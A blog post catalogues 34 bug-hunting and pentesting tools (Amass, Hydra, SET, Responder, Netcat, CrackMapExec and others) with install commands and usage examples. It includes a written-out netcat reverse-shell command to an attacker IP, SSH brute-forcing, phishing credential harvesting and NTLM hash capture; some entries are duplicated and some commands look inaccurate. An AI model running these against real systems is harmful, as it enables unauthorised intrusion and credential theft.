Posted in Cybersecurity

Comprehensive Guide to the Best Bug Hunting, pentesting and Recon Tools for 2024: Techniques, Installations, and Usage Examples

on
Ankit kumar

1. Amass

Amass is a comprehensive tool for subdomain enumeration and network mapping. It integrates data from multiple sources to map out the attack surface.

Installation:

sudo apt install amass

Usage:

amass enum -d example.com

This command performs subdomain enumeration for example.com to find subdomains.

Example:

  • If example.com has subdomains like api.example.com, mail.example.com, blog.example.com, Amass will list them.

2. Sublist3r

Sublist3r is a fast and powerful tool to discover subdomains of a domain.

Installation:

git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
pip install -r requirements.txt

Usage:

python sublist3r.py -d example.com

This will enumerate subdomains for example.com.

Example:

  • If example.com has subdomains such as api.example.com, dev.example.com, Sublist3r will find and list them.

3. DirBuster

DirBuster is a multi-threaded tool used for brute-forcing hidden directories and files on a web server.

Installation:

sudo apt install dirbuster

Usage:

dirbuster -u http://example.com -w /path/to/wordlist.txt

This command brute-forces directories and files at example.com using the wordlist specified.

Example:

  • If you are targeting http://example.com/, DirBuster might reveal hidden directories like /admin/, /login/, or /uploads/.

4. Burp Suite

Burp Suite is an integrated platform for testing the security of web applications. It helps with vulnerability scanning, intrusion testing, and fuzzing.

Installation:

  • Download from Burp Suite.
  • Follow the installation steps.

Usage:

  1. Set up Burp Suite and configure your browser to use Burp’s proxy: 127.0.0.1:8080.
  2. In Burp Suite, go to the “Proxy” tab, and you can intercept HTTP/S requests and responses.
  3. Use the “Scanner” tab to scan for vulnerabilities like SQL injection or Cross-Site Scripting (XSS).

Example:

  • Intercept a request like GET /login?username=admin&password=1234 and modify it for testing.

5. Hydra

Hydra is a password cracking tool used to perform brute-force attacks on various services like SSH, FTP, HTTP, etc.

Installation:

sudo apt install hydra

Usage:

hydra -l admin -P /path/to/rockyou.txt ssh://example.com

This command attempts to brute-force SSH login on example.com with the username admin using the wordlist rockyou.txt.

Example:

  • If the correct password is admin123, Hydra will reveal it after attempting multiple passwords from the wordlist.

6. Nikto

Nikto is a web server scanner that checks for common vulnerabilities such as outdated software and server misconfigurations.

Installation:

sudo apt install nikto

Usage:

nikto -h http://example.com

This command scans example.com for vulnerabilities.

Example:

  • Nikto might discover that example.com is running an outdated version of Apache, which could have known security issues.

7. WPScan

WPScan is a WordPress vulnerability scanner that detects security flaws in WordPress websites, including outdated plugins and themes.

Installation:

sudo apt install wpscan

Usage:

wpscan --url http://example.com

This command scans example.com for WordPress-related vulnerabilities.

Example:

  • WPScan could reveal that example.com is running an outdated version of the WordPress plugin Contact Form 7, which has known vulnerabilities.

8. Social-Engineer Toolkit (SET)

SET is a toolkit for automating social engineering attacks like phishing, credential harvesting, and more.

Installation:

sudo apt install set

Usage:

setoolkit

After running the command, select the social engineering attack you’d like to perform (e.g., phishing, credential harvesting, etc.).

Example:

  • You can use SET to create a fake login page mimicking example.com and harvest login credentials.

9. Responder

Responder is a tool that captures NTLM hashes from unencrypted SMB, HTTP, and NetBIOS traffic in internal networks.

Installation:

git clone https://github.com/lgandx/Responder.git
cd Responder

Usage:

sudo python3 Responder.py -I eth0

This command listens for SMB, HTTP, and NetBIOS traffic on interface eth0 to capture NTLM hashes.

Example:

  • You may intercept traffic containing an NTLM hash like 9a0c8e6b018bda0d05652fe9adadf7c8, which can later be cracked offline.

10. Netcat (nc)

Netcat is a powerful tool for network debugging, banner grabbing, and reverse shells.

Installation:

sudo apt install netcat

Usage:

nc -lvp 4444

This command listens on port 4444 for incoming connections.

Example:

  • To establish a reverse shell, the target can run nc -e /bin/bash <attacker_ip> 4444, and the attacker can connect to the victim’s shell using nc -lvp 4444.

11. Shodan

Shodan is a search engine for internet-connected devices and services. It can help discover exposed services and devices vulnerable to attacks.

Installation:

pip3 install shodan

Usage:

shodan search apache

This command will search Shodan for devices running the Apache HTTP Server.

Example:

  • Shodan might return results of devices with exposed Apache servers, like 192.168.1.100 running Apache 2.4, which may have security flaws.

12. Recon-ng

Recon-ng is an open-source web reconnaissance framework for gathering intelligence about domains and subdomains.

Installation:

git clone https://github.com/lanmaster53/recon-ng.git
cd recon-ng
pip install -r REQUIREMENTS

Usage:

./recon-ng

After running ./recon-ng, you can load modules like recon and perform a reconnaissance on a target domain.

Example:

  • You can use the whois module to gather domain registration information on example.com.

13. Nmap

Nmap is one of the most popular network scanning tools, used for host discovery, port scanning, and service enumeration.

Installation:

sudo apt install nmap

Usage:

nmap example.com

This command scans the host example.com for open ports and services.

Example:

  • Nmap might find that example.com has open ports 80 (HTTP), 443 (HTTPS), and 22 (SSH), which can be further explored.

14. Gobuster

Gobuster is a fast web directory and subdomain brute-forcing tool.

Installation:

sudo apt install gobuster

Usage:

gobuster dir -u http://example.com -w /path/to/wordlist.txt

This command attempts to brute-force directories and files on example.com.

Example:

  • Gobuster might find directories like /admin/ or /private/ on example.com.

15. Aquatone

Aquatone is a tool that takes screenshots of web domains and subdomains, helping with reconnaissance and visual mapping of web assets.

Installation:

gem install aquatone

Usage:

aquatone -d example.com

This command takes screenshots of example.com and its subdomains.

Example:

  • Aquatone could capture screenshots for subdomains like www.example.com, api.example.com, dev.example.com, etc.

16. Masscan

Masscan is a very fast port scanner that can scan large networks at high speeds.

Installation:

sudo apt install masscan

Usage:

masscan -p80,443 192.168.1.0/24

This command scans the IP range 192.168.1.0/24 for open HTTP and HTTPS ports.

Example:

  • Masscan might show that 192.168.1.1 has open ports

80 (HTTP) and 443 (HTTPS), indicating a web server.

17. SSrfmap

SSRFmap is a tool for finding Server-Side Request Forgery (SSRF) vulnerabilities in web applications.

Installation:

git clone https://github.com/swisskyrepo/SSRFmap.git
cd SSRFmap
pip install -r requirements.txt

Usage:

python3 ssrfmap.py -u http://example.com/ -p "http://example.com/ssrf"

This tool will check if example.com is vulnerable to SSRF attacks.

Example:

  • If example.com allows a request to internal services via user input, SSRFmap could potentially identify the vulnerability.

18. ReconDog

ReconDog is a multi-purpose reconnaissance tool that automates domain enumeration, subdomain discovery, and other scans.

Installation:

git clone https://github.com/Tuhinshubhra/ReconDog.git
cd ReconDog
chmod +x setup.sh
./setup.sh

Usage:

./ReconDog.sh -d example.com

This command performs multiple recon techniques for example.com, including subdomain enumeration and DNS analysis.

19. Ffuf (Fuzz Faster U Fool)

Ffuf is a fast web fuzzer that is useful for discovering directories, files, and even virtual hosts on a target domain. It’s lightweight and highly customizable.

Installation:

go install github.com/ffuf/ffuf@latest

Usage:

ffuf -w /path/to/wordlist.txt -u http://example.com/FUZZ

This command will fuzz the URL http://example.com/FUZZ using words from the wordlist provided.

Example:

  • If example.com has hidden files like /admin/ or /secret/, ffuf will discover them.

20. DNSMap

DNSMap is a DNS network mapper that enumerates subdomains by brute-forcing DNS records.

Installation:

git clone https://github.com/mm0r1/dnsmap.git
cd dnsmap
make

Usage:

./dnsmap -d example.com

This command will attempt to discover subdomains of example.com by brute-forcing DNS records.

Example:

  • DNSMap might discover subdomains like mail.example.com, blog.example.com, etc.

21. Shodan Search

Shodan is a search engine for internet-connected devices. It finds devices running various services, including outdated software, exposed databases, and more.

Installation:

pip install shodan

Usage:

shodan search apache

This command searches Shodan for servers running Apache HTTP Server.

Example:

  • Shodan might return results showing vulnerable Apache servers with specific open ports, which can be explored for known exploits.

22. Spiderfoot

Spiderfoot is an open-source OSINT (Open-Source Intelligence) tool for automating the gathering of information about IP addresses, domain names, and more.

Installation:

git clone https://github.com/smicallef/spiderfoot.git
cd spiderfoot
python3 setup.py install

Usage:

python3 sf.py -s example.com

This command will start the scan on the domain example.com for open ports, subdomains, email addresses, and more.

Example:

  • Spiderfoot will gather information such as IP addresses, WHOIS data, and other associated domain information.

23. Knockpy

Knockpy is a subdomain scanner written in Python, designed to discover subdomains by brute-forcing domain names.

Installation:

git clone https://github.com/guelfoweb/knock.py
cd knock.py
pip install -r requirements.txt

Usage:

python knockpy.py example.com

This command performs subdomain enumeration for example.com.

Example:

  • Knockpy might find subdomains like api.example.com, dev.example.com, and secure.example.com.

24. OpenVAS

OpenVAS is an open-source vulnerability scanner that scans entire networks to find security issues in web applications and network services.

Installation:

sudo apt install openvas

Usage:

openvas-start

This will start OpenVAS and begin scanning configured targets for vulnerabilities.

Example:

  • OpenVAS might detect vulnerabilities in web services like SQL injection or outdated versions of Apache or nginx.

25. SpiderMan

SpiderMan is a framework used for reconnaissance and bug hunting. It helps automate the process of discovering new subdomains, checking SSL certificates, and performing DNS queries.

Installation:

git clone https://github.com/devanshbatham/SpiderMan.git
cd SpiderMan
pip install -r requirements.txt

Usage:

python3 spiderMan.py -d example.com

This command will gather subdomains and other relevant data for example.com.

Example:

  • SpiderMan might reveal subdomains such as api.example.com, ftp.example.com, and mail.example.com.

26. Recon-ng

Recon-ng is a full-featured web reconnaissance framework. It comes with a powerful set of modules for gathering information on domains, subdomains, and much more.

Installation:

git clone https://github.com/lanmaster53/recon-ng.git
cd recon-ng
pip install -r requirements.txt

Usage:

./recon-ng

After launching, you can load modules like whois to gather WHOIS data for example.com.

Example:

  • Recon-ng can find the domain’s registrant details, IP address, and associated assets.

27. ZAP (OWASP Zed Attack Proxy)

ZAP is a security scanner used to find vulnerabilities in web applications, including SQL injections and cross-site scripting (XSS).

Installation:

sudo apt install zaproxy

Usage:

  1. Open ZAP GUI with zaproxy.
  2. Configure ZAP as your proxy server (127.0.0.1:8080).
  3. Use ZAP’s active scan to find vulnerabilities on example.com.

Example:

  • ZAP might detect vulnerabilities like SQL injections, weak SSL/TLS configurations, or open ports.

28. TCPdump

TCPdump is a network packet analyzer used to capture and analyze network traffic.

Installation:

sudo apt install tcpdump

Usage:

sudo tcpdump -i eth0 -nn -s0

This command will capture network traffic on interface eth0 and display it in real-time.

Example:

  • You can capture HTTP traffic, extract session cookies, or monitor DNS queries to find sensitive information being transmitted in plaintext.

29. BloodHound

BloodHound is an Active Directory enumeration tool that helps in finding privilege escalation paths in Windows domains.

Installation:

git clone https://github.com/BloodHoundAD/BloodHound.git
cd BloodHound
npm install

Usage:

SharpHound.exe -ip <IP of the Domain Controller>

This command runs a BloodHound enumeration to find possible attack paths in an Active Directory environment.

Example:

  • BloodHound can reveal paths like users with administrative rights or groups with elevated privileges.

30. Netdiscover

Netdiscover is a tool for network discovery, mainly used for identifying live hosts in a subnet.

Installation:

sudo apt install netdiscover

Usage:

sudo netdiscover -r 192.168.1.0/24

This will scan the subnet 192.168.1.0/24 for live hosts.

Example:

  • Netdiscover will display all live hosts in the subnet, such as 192.168.1.1, 192.168.1.2, and their MAC addresses.

31. Nikto

Nikto is a web server scanner that checks for outdated software, security flaws, and vulnerabilities like SQL injections, XSS, etc.

Installation:

sudo apt install nikto

Usage:

nikto -h http://example.com

This scans example.com for known vulnerabilities in the web server.

Example:

  • Nikto may find issues like outdated Apache versions or misconfigurations that can be exploited.

32. Patator

Patator is a powerful multi-purpose brute-forcing tool that supports various protocols and is more customizable than traditional tools like Hydra.

Installation:

git clone https://github.com/lanjelot/patator.git
cd patator

Usage:

python patator.py http_fuzz -url http://example.com/FUZZ -l /path/to/wordlist.txt

This command fuzzes the URL with the wordlist to discover hidden directories.

Example:

  • Patator might discover hidden endpoints like /admin/ or /login/.

33. CrackMapExec (CME)

CrackMapExec is a tool for automating the post-exploitation process in a Windows network. It helps in SMB enumeration, credential validation, and lateral movement.

Installation:

git clone https://github.com/byt3bl33d3r/CrackMapExec.git
cd CrackMapExec
python3 setup.py install

Usage:

crackmapexec smb 192.168.1.0/24 -u 'user' -p 'password'

This command checks the SMB share access for user:password on all machines in the subnet 192.168.1.0/24.

Example:

  • CrackMapExec can identify machines where the credentials are valid, helping you move laterally in the network.

34. Subjack

Subjack is a subdomain takeover vulnerability scanner, checking for vulnerable DNS configurations that allow attackers to seize control of subdomains.

Installation:

go install github.com/haccer/subjack@latest

Usage:

subjack -w subdomains.txt -t 100 -o results.txt

This command checks for potential subdomain takeovers listed in subdomains.txt.

Example:

  • Subjack could find that the ftp.example.com subdomain is vulnerable to takeover.

You May Also Like

More From Author

In-Depth Guide on DoS, DDoS, Botnets, and Mitigating Them with VPS Solutions.

Hogwarts KOTH TryHackme

Leave a Reply

Your email address will not be published. Required fields are marked *